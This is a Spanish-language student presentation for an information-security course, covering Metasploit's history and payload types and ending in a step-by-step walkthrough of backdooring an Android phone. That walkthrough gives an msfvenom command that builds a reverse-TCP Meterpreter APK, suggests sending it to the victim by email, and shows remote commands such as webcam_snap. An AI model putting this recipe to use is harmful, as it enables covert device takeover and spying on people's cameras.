Want to create interactive content? It’s easy in Genially!

Get started free

metasploit y,msf payload creator

JUAN ESTEBAN PULGARIN GALLEGO

Created on October 20, 2022

Start designing with a free template

Discover more than 1500 professional designs like these:

Geniaflix Presentation

Vintage Mosaic Presentation

Shadow Presentation

Newspaper Presentation

Zen Presentation

Audio tutorial

Pechakucha Presentation

Transcript

METASPLOID MSF PAYLOAD CREATOR

01

SEGURIDAD INFORMATICA

Por: Juan Esteban Pulgarin GallegoJulián David Molina JaramilloJuan Sebastian Acevedo Chica

Institucion Universitaria Pascual Bravo

Historia de Metasploit

02

Metasploit fue creado por H.D Moore en el 2003, como una herramienta de red portátil usando el lenguaje Perl. El 21 de octubre de 2009, el Proyecto Metasploit anunció​ que había sido adquirida por Rapid7, una empresa de seguridad que ofrece soluciones unificadas de gestión de vulnerabilidades. Al igual que los productos de la competencia, como Core Security Technologies y Core Impacto, Metasploit se puede utilizar para probar la vulnerabilidad de los sistemas informáticos o entrar en sistemas remotos. Al igual que muchas herramientas de seguridad informática, Metasploit se puede utilizar tanto para actividades legítimas y autorizadas como para actividades ilícitas. Desde la adquisición de Metasploit Framework, Rapid7 ha añadido dos Open source "Código abierto" llamados Metasploit Express y Metasploit Pro. Metasploit 3.0 comenzó a incluir herramientas de fuzzing, utilizadas para descubrir las vulnerabilidades del software, en lugar de sólo explotar bugs conocidos. Metasploit 4.0 fue lanzado en agosto de 2011.

Para que sirve

03

es un proyecto de código abierto para la seguridad informática, que proporciona información acerca de vulnerabilidades de seguridad y ayuda en tests de penetración "Pentesting" y el desarrollo de firmas para sistemas de detección de intrusos

¿Cómo funciona?

04

La arquitectura de Metasploit consta de las siguientes partes: Interfaces Las interfaces son las diferentes plataformas a través de las cuales los usuarios pueden acceder a Metasploit Framework. Bibliotecas Las bibliotecas contienen las diferentes funciones de Metasploit Framework que permiten a los usuarios ejecutar exploits sin escribir código adicional. Hay tres bibliotecas de Metasploit: REX: habilita las tareas más básicas; contiene Base64, HTTP, SMB, SSL y Unicode. MSF Core: proporciona una API común y define Metasploit Framework. Base de MSF: proporciona una API fácil de usar. Módulos Metasploit Framework utiliza un software llamado módulos que se utilizan para realizar tareas como escaneos y explotación de objetivos.

05

¿Qué vulnerabilidad explota o que causan?

06

Exploits : son softwares diseñados especialmente para aprovechar un fallo de seguridad. Estos programas contienen un payload, es decir, un código malicioso que se instala en el dispositivo de la víctima después de haber ejecutado el exploit. Metasploit ofrece un «banco» de este tipo de softwares . Este tipo de software se puede ejecutar en cualquier sistema informatico por lo hay que tener mucho cuidado, ya que con este Incluso se puede instalar una máquina remota en un ordenador infectado, lo cual se considera uno de los máximos peligros para un sistema. Payload : es la carga que se ejecuta en esa vulnerabilidad, es decir, la carga que activamos a la hora de aprovechar dicha vulnerabilidad. Un mismo payload puede ser utilizado por distintos exploits y un mismo exploit puede utilizar varios payloads. Metasploit tiene sobre 1800 exploits, y más de 1000 payloads. Existen diferentes payloads para cada vulnerabilidad.

07

MSF PAYLOAD CREATOR

SEGURIDAD INFORMATICA

¿Para qué sirve y como funciona?

08

Las herramientas msfpayload y msfencode de Metasploit han despaarecido dejando paso a su sucesor msfvenom. El 8 de junio de 2015, el msfpayload y msfencode se retiran del repositorio de Metasploit. Recordemos que Metasploit es un “Framework” para realizar test de intrusión desarrollada por Rapid 7. Msfvenom Payload Creator (MPC) es un contenedor para generar múltiples tipos de cargas útiles, basados en elección de los usuarios. La idea es ser lo más simple posible (sólo requieren una entrada) para producir su payload Automatizar totalmente el msfvenom y Metasploit es el objetivo final (así como ser capaz de automatizar MPC en sí).

¿Pueden entrar y afectar a una computadora o a un dispositivo móvil?

09

La única entrada necesaria del usuario debería ser la definición que quiere del payload con la plataforma (por ejemplo, Windows) y la extensión de archivo que quiere que tenga (por ejemplo, exe).

Tipos

Bind (directo): en el que la máquina del hacker se conecta a la de la víctima. Reverse (inverso): en el que la máquina de la víctima se conecta a la del hacker. Shellcode: es un tipo de código que viene en un lenguaje de programación ensamblado y se inyecta en la memoria del ordenador por medio de algún software vulnerable. Permite ejecutar tareas maliciosas sin ser detenidas por el procesador. Ejecución de comandos: dependiendo del tipo de vulnerabilidad, el tamaño del payload puede variar. Si el tamaño del payload es muy pequeño y solo podemos ejecutar algunos comandos, podemos crear una puerta trasera en el sistema por medio de la creación de un usuario. Meterpreter: es un tipo de payload muy complejo y completo a la vez. Asimismo, es de gran tamaño y, por eso, no funciona con todas las vulnerabilidades. Por medio de este payload puedes ejecutar código de forma remota e, incluso, acceder a todas las funciones del sistema.

Como Afectar Un Android Por Medio De Una Aplicación APK

10

SEGURIDAD INFORMATICA

Generamos El Siguiente PayLoad Que Se Camuflará Dentro De La APK

11

PayLoad de tipo reverso que se conectará a nuestra maquina desde el equipo de la victima a traves del puerto.

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=555 -o /root/Documents/paulapp.apk

Una Vez Creado El Archivo Buscaremos La Forma De Hacerlo Llegar Al Celular De La Victima

12

Infectar

13

Teniendo nuestro celular en fisico lo podriamos compartir a traves de las carpetas compartidas de nuestro mismo celular.

Esta es la forma mas directa de infecctación pero menos recomendable, tambien se le puede hacer llegar desde correo electronico la APP o otra fuente externa no sospechosa para que la victima pueda instalar la app en su dispositivo.

Infectar

14

Habilitamos la escucha para detectar cuando la victima instale la app. Lo primero es habilitar el msfconsole.

Habilitamos La Escucha

15

Setear el payload, el LHOST, el LPORT y habilitar el exploit.

Vista Desde Nuestro Dispositivo

16

Se procede con la instalacion de la APP.

Manipulación

17

Una vez instalada la APP detectamos al equipo en nuestro sistema y con el comando sysinfo podemos verificar la información del mismo.

Manipulación

18

Con el comando HELP podemos ver algunas de las opciones que podemos ir utilizando.

Manipulación

19

Comando webcam_snap para conseguir lo que esta viendo el dispositivo desde la camara trasera.

GRACIAS